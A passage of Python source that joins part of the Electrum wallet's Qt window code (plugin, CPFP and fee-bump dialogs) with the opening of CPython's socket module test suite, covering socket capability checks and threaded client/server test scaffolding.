if self.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.network.unregister_callback(self.on_quotes)
self.network.unregister_callback(self.on_history)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.config.set_key("console-history", self.console.history[-50:],
True)
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.print_msg("error: cannot display plugin", name)
traceback.print_exc(file=sys.stdout)
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp(self, parent_tx, new_tx):
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
def f(x):
a = max_fee - fee_e.get_amount()
output_amount.setText((self.format_amount(a) + ' ' + self.base_unit()) if a else '')
fee_e.textChanged.connect(f)
fee = self.config.fee_per_kb() * total_size / 1000
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee' + ':')), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * total_size / 1000
fee = min(max_fee, fee)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
new_tx.set_rbf(True)
self.show_transaction(new_tx)
def bump_fee_dialog(self, tx):
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if fee is None:
self.show_error(_("Can't bump fee: unknown fee for original transaction."))
return
tx_label = self.wallet.get_label(tx.txid())
tx_size = tx.estimated_size()
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool.")))
vbox.addWidget(QLabel(_('Current fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
vbox.addWidget(QLabel(_('New fee' + ':')))
fee_e = BTCAmountEdit(self.get_decimal_point)
fee_e.setAmount(fee * 1.5)
vbox.addWidget(fee_e)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * tx_size / 1000
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
vbox.addWidget(fee_slider)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee = fee_e.get_amount()
delta = new_fee - fee
if delta < 0:
self.show_error("fee too low")
return
try:
new_tx = self.wallet.bump_fee(tx, delta)
except CannotBumpFee as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_label)
def save_transaction_into_wallet(self, tx):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx.txid(), tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.save_transactions(write=True)
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
|
test_socket.py
|
import unittest
from test import support
import errno
import io
import itertools
import socket
import select
import tempfile
import time
import traceback
import queue
import sys
import os
import platform
import array
import contextlib
from weakref import proxy
import signal
import math
import pickle
import struct
import random
import shutil
import string
import _thread as thread
import threading
try:
import multiprocessing
except ImportError:
multiprocessing = False
try:
import fcntl
except ImportError:
fcntl = None
HOST = support.HOST
# test unicode string and carriage return
MSG = 'Michael Gilfix was here\u1234\r\n'.encode('utf-8')
MAIN_TIMEOUT = 60.0
VSOCKPORT = 1234
AIX = platform.system() == "AIX"
try:
import _socket
except ImportError:
_socket = None
def get_cid():
if fcntl is None:
return None
try:
with open("/dev/vsock", "rb") as f:
r = fcntl.ioctl(f, socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID, " ")
except OSError:
return None
else:
return struct.unpack("I", r)[0]
def _have_socket_can():
"""Check whether CAN sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_can_isotp():
"""Check whether CAN ISOTP sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_rds():
"""Check whether RDS sockets are supported on this host."""
try:
s = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_alg():
"""Check whether AF_ALG sockets are supported on this host."""
try:
s = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_qipcrtr():
"""Check whether AF_QIPCRTR sockets are supported on this host."""
try:
s = socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_vsock():
"""Check whether AF_VSOCK sockets are supported on this host."""
ret = get_cid() is not None
return ret
@contextlib.contextmanager
def socket_setdefaulttimeout(timeout):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(timeout)
yield
finally:
socket.setdefaulttimeout(old_timeout)
HAVE_SOCKET_CAN = _have_socket_can()
HAVE_SOCKET_CAN_ISOTP = _have_socket_can_isotp()
HAVE_SOCKET_RDS = _have_socket_rds()
HAVE_SOCKET_ALG = _have_socket_alg()
HAVE_SOCKET_QIPCRTR = _have_socket_qipcrtr()
HAVE_SOCKET_VSOCK = _have_socket_vsock()
# Size in bytes of the int type
SIZEOF_INT = array.array("i").itemsize
class SocketTCPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(self.serv)
self.serv.listen()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketUDPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.port = support.bind_port(self.serv)
def tearDown(self):
self.serv.close()
self.serv = None
class ThreadSafeCleanupTestCase(unittest.TestCase):
"""Subclass of unittest.TestCase with thread-safe cleanup methods.
This subclass protects the addCleanup() and doCleanups() methods
with a recursive lock.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._cleanup_lock = threading.RLock()
def addCleanup(self, *args, **kwargs):
with self._cleanup_lock:
return super().addCleanup(*args, **kwargs)
def doCleanups(self, *args, **kwargs):
with self._cleanup_lock:
return super().doCleanups(*args, **kwargs)
class SocketCANTest(unittest.TestCase):
"""To be able to run this test, a `vcan0` CAN interface can be created with
the following commands:
# modprobe vcan
# ip link add dev vcan0 type vcan
# ifconfig vcan0 up
"""
interface = 'vcan0'
bufsize = 128
"""The CAN frame structure is defined in <linux/can.h>:
struct can_frame {
canid_t can_id; /* 32 bit CAN_ID + EFF/RTR/ERR flags */
__u8 can_dlc; /* data length code: 0 .. 8 */
__u8 data[8] __attribute__((aligned(8)));
};
"""
can_frame_fmt = "=IB3x8s"
can_frame_size = struct.calcsize(can_frame_fmt)
"""The Broadcast Management Command frame structure is defined
in <linux/can/bcm.h>:
struct bcm_msg_head {
__u32 opcode;
__u32 flags;
__u32 count;
struct timeval ival1, ival2;
canid_t can_id;
__u32 nframes;
struct can_frame frames[0];
}
`bcm_msg_head` must be 8 bytes aligned because of the `frames` member (see
`struct can_frame` definition). Must use native not standard types for packing.
"""
bcm_cmd_msg_fmt = "@3I4l2I"
bcm_cmd_msg_fmt += "x" * (struct.calcsize(bcm_cmd_msg_fmt) % 8)
def setUp(self):
self.s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
self.addCleanup(self.s.close)
try:
self.s.bind((self.interface,))
except OSError:
self.skipTest('network interface `%s` does not exist' %
self.interface)
class SocketRDSTest(unittest.TestCase):
"""To be able to run this test, the `rds` kernel module must be loaded:
# modprobe rds
"""
bufsize = 8192
def setUp(self):
self.serv = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
self.addCleanup(self.serv.close)
try:
self.port = support.bind_port(self.serv)
except OSError:
self.skipTest('unable to bind RDS socket')
class ThreadableTest:
"""Threadable Test class
The ThreadableTest class makes it easy to create a threaded
client/server pair from an existing unit test. To create a
new threaded class from an existing unit test, use multiple
inheritance:
class NewClass (OldClass, ThreadableTest):
pass
This class defines two new fixture functions with obvious
purposes for overriding:
clientSetUp ()
clientTearDown ()
Any new test functions within the class must then define
tests in pairs, where the test name is preceded with a
'_' to indicate the client portion of the test. Ex:
def testFoo(self):
# Server portion
def _testFoo(self):
# Client portion
Any exceptions raised by the clients during their tests
are caught and transferred to the main thread to alert
the testing framework.
Note, the server setup function cannot call any blocking
functions that rely on the client thread during setup,
unless serverExplicitReady() is called just before
the blocking call (such as in setting up a client/server
connection and performing the accept() in setUp().
"""
def __init__(self):
# Swap the true setup function
self.__setUp = self.setUp
self.__tearDown = self.tearDown
self.setUp = self._setUp
self.tearDown = self._tearDown
def serverExplicitReady(self):
"""This method allows the server to explicitly indicate that
it wants the client thread to proceed. This is useful if the
server is about to execute a blocking routine that is
dependent upon the client thread during its setup routine."""
self.server_ready.set()
def _setUp(self):
self.wait_threads = support.wait_threads_exit()
self.wait_threads.__enter__()
self.server_ready = threading.Event()
self.client_ready = threading.Event()
self.done = threading.Event()
self.queue = queue.Queue(1)
self.server_crashed = False
# Do some munging to start the client test.
methodname = self.id()
i = methodname.rfind('.')
methodname = methodname[i+1:]
test_method = getattr(self, '_' + methodname)
self.client_thread = thread.start_new_thread(
self.clientRun, (test_method,))
try:
self.__setUp()
except:
self.server_crashed = True
raise
finally:
self.server_ready.set()
self.client_ready.wait()
def _tearDown(self):
self.__tearDown()
self.done.wait()
self.wait_threads.__exit__(None, None, None)
if self.queue.qsize():
exc = self.queue.get()
raise exc
def clientRun(self, test_func):
self.server_ready.wait()
try:
self.clientSetUp()
except BaseException as e:
self.queue.put(e)
self.clientTearDown()
return
finally:
self.client_ready.set()
if self.server_crashed:
self.clientTearDown()
return
if not hasattr(test_func, '__call__'):
raise TypeError("test_func must be a callable function")
try:
test_func()
except BaseException as e:
self.queue.put(e)
finally:
self.clientTearDown()
def clientSetUp(self):
raise NotImplementedError("clientSetUp must be implemented.")
def clientTearDown(self):
self.done.set()
thread.exit()
class ThreadedTCPSocketTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedUDPSocketTest(SocketUDPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketUDPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedCANSocketTest(SocketCANTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketCANTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
try:
self.cli.bind((self.interface,))
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedRDSSocketTest(SocketRDSTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketRDSTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
try:
# RDS sockets must be bound explicitly to send or receive data
self.cli.bind((HOST, 0))
self.cli_addr = self.cli.getsockname()
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
'VSOCK sockets required for this test.')
@unittest.skipUnless(get_cid() != 2,
"This test can only be run on a virtual guest.")
class ThreadedVSOCKSocketStreamTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
self.addCleanup(self.serv.close)
self.serv.bind((socket.VMADDR_CID_ANY, VSOCKPORT))
self.serv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.serv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
time.sleep(0.1)
self.cli = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
cid = get_cid()
self.cli.connect((cid, VSOCKPORT))
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
class SocketConnectedTest(ThreadedTCPSocketTest):
"""Socket tests for client-server connection.
self.cli_conn is a client socket connected to the server. The
setUp() method guarantees that it is connected to the server.
"""
def __init__(self, methodName='runTest'):
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def setUp(self):
ThreadedTCPSocketTest.setUp(self)
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
ThreadedTCPSocketTest.tearDown(self)
def clientSetUp(self):
ThreadedTCPSocketTest.clientSetUp(self)
self.cli.connect((HOST, self.port))
self.serv_conn = self.cli
def clientTearDown(self):
self.serv_conn.close()
self.serv_conn = None
ThreadedTCPSocketTest.clientTearDown(self)
class SocketPairTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv, self.cli = socket.socketpair()
def tearDown(self):
self.serv.close()
self.serv = None
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
# The following classes are used by the sendmsg()/recvmsg() tests.
# Combining, for instance, ConnectedStreamTestMixin and TCPTestBase
# gives a drop-in replacement for SocketConnectedTest, but different
# address families can be used, and the attributes serv_addr and
# cli_addr will be set to the addresses of the endpoints.
class SocketTestBase(unittest.TestCase):
"""A base class for socket tests.
Subclasses must provide methods newSocket() to return a new socket
and bindSock(sock) to bind it to an unused address.
Creates a socket self.serv and sets self.serv_addr to its address.
"""
def setUp(self):
self.serv = self.newSocket()
self.bindServer()
def bindServer(self):
"""Bind server socket and set self.serv_addr to its address."""
self.bindSock(self.serv)
self.serv_addr = self.serv.getsockname()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketListeningTestMixin(SocketTestBase):
"""Mixin to listen on the server socket."""
def setUp(self):
super().setUp()
self.serv.listen()
class ThreadedSocketTestMixin(ThreadSafeCleanupTestCase, SocketTestBase,
ThreadableTest):
"""Mixin to add client socket and allow client/server tests.
Client socket is self.cli and its address is self.cli_addr. See
ThreadableTest for usage information.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = self.newClientSocket()
self.bindClient()
def newClientSocket(self):
"""Return a new socket for use as client."""
return self.newSocket()
def bindClient(self):
"""Bind client socket and set self.cli_addr to its address."""
self.bindSock(self.cli)
self.cli_addr = self.cli.getsockname()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ConnectedStreamTestMixin(SocketListeningTestMixin,
ThreadedSocketTestMixin):
"""Mixin to allow client/server stream tests with connected client.
Server's socket representing connection to client is self.cli_conn
and client's connection to server is self.serv_conn. (Based on
SocketConnectedTest.)
"""
def setUp(self):
super().setUp()
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
super().tearDown()
def clientSetUp(self):
super().clientSetUp()
self.cli.connect(self.serv_addr)
self.serv_conn = self.cli
def clientTearDown(self):
try:
self.serv_conn.close()
self.serv_conn = None
except AttributeError:
pass
super().clientTearDown()
class UnixSocketTestBase(SocketTestBase):
"""Base class for Unix-domain socket tests."""
# This class is used for file descriptor passing tests, so we
# create the sockets in a private directory so that other users
# can't send anything that might be problematic for a privileged
# user running the tests.
def setUp(self):
self.dir_path = tempfile.mkdtemp()
self.addCleanup(os.rmdir, self.dir_path)
super().setUp()
def bindSock(self, sock):
path = tempfile.mktemp(dir=self.dir_path)
support.bind_unix_socket(sock, path)
self.addCleanup(support.unlink, path)
class UnixStreamBase(UnixSocketTestBase):
"""Base class for Unix-domain SOCK_STREAM tests."""
def newSocket(self):
return socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
class InetTestBase(SocketTestBase):
"""Base class for IPv4 socket tests."""
host = HOST
def setUp(self):
super().setUp()
self.port = self.serv_addr[1]
def bindSock(self, sock):
support.bind_port(sock, host=self.host)
class TCPTestBase(InetTestBase):
"""Base class for TCP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM)
class UDPTestBase(InetTestBase):
"""Base class for UDP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
class SCTPStreamBase(InetTestBase):
"""Base class for SCTP tests in one-to-one (SOCK_STREAM) mode."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM,
socket.IPPROTO_SCTP)
class Inet6TestBase(InetTestBase):
"""Base class for IPv6 socket tests."""
host = support.HOSTv6
class UDP6TestBase(Inet6TestBase):
"""Base class for UDP-over-IPv6 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
# Test-skipping decorators for use with ThreadableTest.
def skipWithClientIf(condition, reason):
"""Skip decorated test if condition is true, add client_skip decorator.
If the decorated object is not a class, sets its attribute
"client_skip" to a decorator which will return an empty function
if the test is to be skipped, or the original function if it is
not. This can be used to avoid running the client part of a
skipped test when using ThreadableTest.
"""
def client_pass(*args, **kwargs):
pass
def skipdec(obj):
retval = unittest.skip(reason)(obj)
if not isinstance(obj, type):
retval.client_skip = lambda f: client_pass
return retval
def noskipdec(obj):
if not (isinstance(obj, type) or hasattr(obj, "client_skip")):
obj.client_skip = lambda f: f
return obj
return skipdec if condition else noskipdec
def requireAttrs(obj, *attributes):
"""Skip decorated test if obj is missing any of the given attributes.
Sets client_skip attribute as skipWithClientIf() does.
"""
missing = [name for name in attributes if not hasattr(obj, name)]
return skipWithClientIf(
missing, "don't have " + ", ".join(name for name in missing))
def requireSocket(*args):
"""Skip decorated test if a socket cannot be created with given arguments.
When an argument is given as a string, will use the value of that
attribute of the socket module, or skip the test if it doesn't
exist. Sets client_skip attribute as skipWithClientIf() does.
"""
err = None
missing = [obj for obj in args if
isinstance(obj, str) and not hasattr(socket, obj)]
if missing:
err = "don't have " + ", ".join(name for name in missing)
else:
callargs = [getattr(socket, obj) if isinstance(obj, str) else obj
for obj in args]
try:
s = socket.socket(*callargs)
except OSError as e:
# XXX: check errno?
err = str(e)
else:
s.close()
return skipWithClientIf(
err is not None,
"can't create socket({0}): {1}".format(
", ".join(str(o) for o in args), err))
#######################################################################
## Begin Tests
class GeneralModuleTests(unittest.TestCase):
def test_SocketType_is_socketobject(self):
import _socket
self.assertTrue(socket.SocketType is _socket.socket)
s = socket.socket()
self.assertIsInstance(s, socket.SocketType)
s.close()
def test_repr(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
with s:
self.assertIn('fd=%i' % s.fileno(), repr(s))
self.assertIn('family=%s' % socket.AF_INET, repr(s))
self.assertIn('type=%s' % socket.SOCK_STREAM, repr(s))
self.assertIn('proto=0', repr(s))
self.assertNotIn('raddr', repr(s))
s.bind(('127.0.0.1', 0))
self.assertIn('laddr', repr(s))
self.assertIn(str(s.getsockname()), repr(s))
self.assertIn('[closed]', repr(s))
self.assertNotIn('laddr', repr(s))
@unittest.skipUnless(_socket is not None, 'need _socket module')
def test_csocket_repr(self):
s = _socket.socket(_socket.AF_INET, _socket.SOCK_STREAM)
try:
expected = ('<socket object, fd=%s, family=%s, type=%s, proto=%s>'
% (s.fileno(), s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
finally:
s.close()
expected = ('<socket object, fd=-1, family=%s, type=%s, proto=%s>'
% (s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
def test_weakref(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
p = proxy(s)
self.assertEqual(p.fileno(), s.fileno())
s = None
try:
p.fileno()
except ReferenceError:
pass
else:
self.fail('Socket proxy still exists')
def testSocketError(self):
# Testing socket module exceptions
msg = "Error raising socket exception (%s)."
with self.assertRaises(OSError, msg=msg % 'OSError'):
raise OSError
with self.assertRaises(OSError, msg=msg % 'socket.herror'):
raise socket.herror
with self.assertRaises(OSError, msg=msg % 'socket.gaierror'):
raise socket.gaierror
def testSendtoErrors(self):
# Testing that sendto doesn't mask failures. See #10169.
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
if sys.platform == 'OpenVMS':
s.bind(('127.0.0.1', 0))
else:
s.bind(('', 0))
sockname = s.getsockname()
# 2 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None)
self.assertIn('not NoneType',str(cm.exception))
# 3 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, None)
self.assertIn('not NoneType', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 'bar', sockname)
self.assertIn('an integer is required', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None, None)
self.assertIn('an integer is required', str(cm.exception))
# wrong number of args
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo')
self.assertIn('(1 given)', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, sockname, 4)
self.assertIn('(4 given)', str(cm.exception))
def testCrucialConstants(self):
# Testing for mission critical constants
socket.AF_INET
if socket.has_ipv6:
socket.AF_INET6
socket.SOCK_STREAM
socket.SOCK_DGRAM
socket.SOCK_RAW
socket.SOCK_RDM
socket.SOCK_SEQPACKET
socket.SOL_SOCKET
socket.SO_REUSEADDR
def testCrucialIpProtoConstants(self):
socket.IPPROTO_TCP
socket.IPPROTO_UDP
if socket.has_ipv6:
socket.IPPROTO_IPV6
@unittest.skipUnless(os.name == "nt", "Windows specific")
def testWindowsSpecificConstants(self):
socket.IPPROTO_ICLFXBM
socket.IPPROTO_ST
socket.IPPROTO_CBT
socket.IPPROTO_IGP
socket.IPPROTO_RDP
socket.IPPROTO_PGM
socket.IPPROTO_L2TP
socket.IPPROTO_SCTP
def testHostnameRes(self):
# Testing hostname resolution mechanisms
hostname = socket.gethostname()
try:
ip = socket.gethostbyname(hostname)
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertTrue(ip.find('.') >= 0, "Error resolving host to ip.")
try:
hname, aliases, ipaddrs = socket.gethostbyaddr(ip)
except OSError:
# Probably a similar problem as above; skip this test
self.skipTest('name lookup failure')
all_host_names = [hostname, hname] + aliases
fqhn = socket.getfqdn(ip)
if not fqhn in all_host_names:
self.fail("Error testing host resolution mechanisms. (fqdn: %s, all: %s)" % (fqhn, repr(all_host_names)))
def test_host_resolution(self):
for addr in [support.HOSTv4, '10.0.0.1', '255.255.255.255']:
self.assertEqual(socket.gethostbyname(addr), addr)
# we don't test support.HOSTv6 because there's a chance it doesn't have
# a matching name entry (e.g. 'ip6-localhost')
for host in [support.HOSTv4]:
self.assertIn(host, socket.gethostbyaddr(host)[2])
def test_host_resolution_bad_address(self):
# These are all malformed IP addresses and expected not to resolve to
# any result. But some ISPs, e.g. AWS, may successfully resolve these
# IPs.
explanation = (
"resolving an invalid IP address did not raise OSError; "
"can be caused by a broken DNS server"
)
for addr in ['0.1.1.~1', '1+.1.1.1', '::1q', '::1::2',
'1:1:1:1:1:1:1:1:1']:
with self.assertRaises(OSError, msg=addr):
socket.gethostbyname(addr)
with self.assertRaises(OSError, msg=explanation):
socket.gethostbyaddr(addr)
@unittest.skipUnless(hasattr(socket, 'sethostname'), "test needs socket.sethostname()")
@unittest.skipUnless(hasattr(socket, 'gethostname'), "test needs socket.gethostname()")
def test_sethostname(self):
oldhn = socket.gethostname()
try:
socket.sethostname('new')
except OSError as e:
if e.errno == errno.EPERM:
self.skipTest("test should be run as root")
else:
raise
try:
# running test as root!
self.assertEqual(socket.gethostname(), 'new')
# Should work with bytes objects too
socket.sethostname(b'bar')
self.assertEqual(socket.gethostname(), 'bar')
finally:
socket.sethostname(oldhn)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
'socket.if_nameindex() not available.')
def testInterfaceNameIndex(self):
interfaces = socket.if_nameindex()
for index, name in interfaces:
self.assertIsInstance(index, int)
self.assertIsInstance(name, str)
# interface indices are non-zero integers
self.assertGreater(index, 0)
_index = socket.if_nametoindex(name)
self.assertIsInstance(_index, int)
self.assertEqual(index, _index)
_name = socket.if_indextoname(index)
self.assertIsInstance(_name, str)
self.assertEqual(name, _name)
@unittest.skipUnless(hasattr(socket, 'if_indextoname'),
'socket.if_indextoname() not available.')
def testInvalidInterfaceIndexToName(self):
self.assertRaises(OSError, socket.if_indextoname, 0)
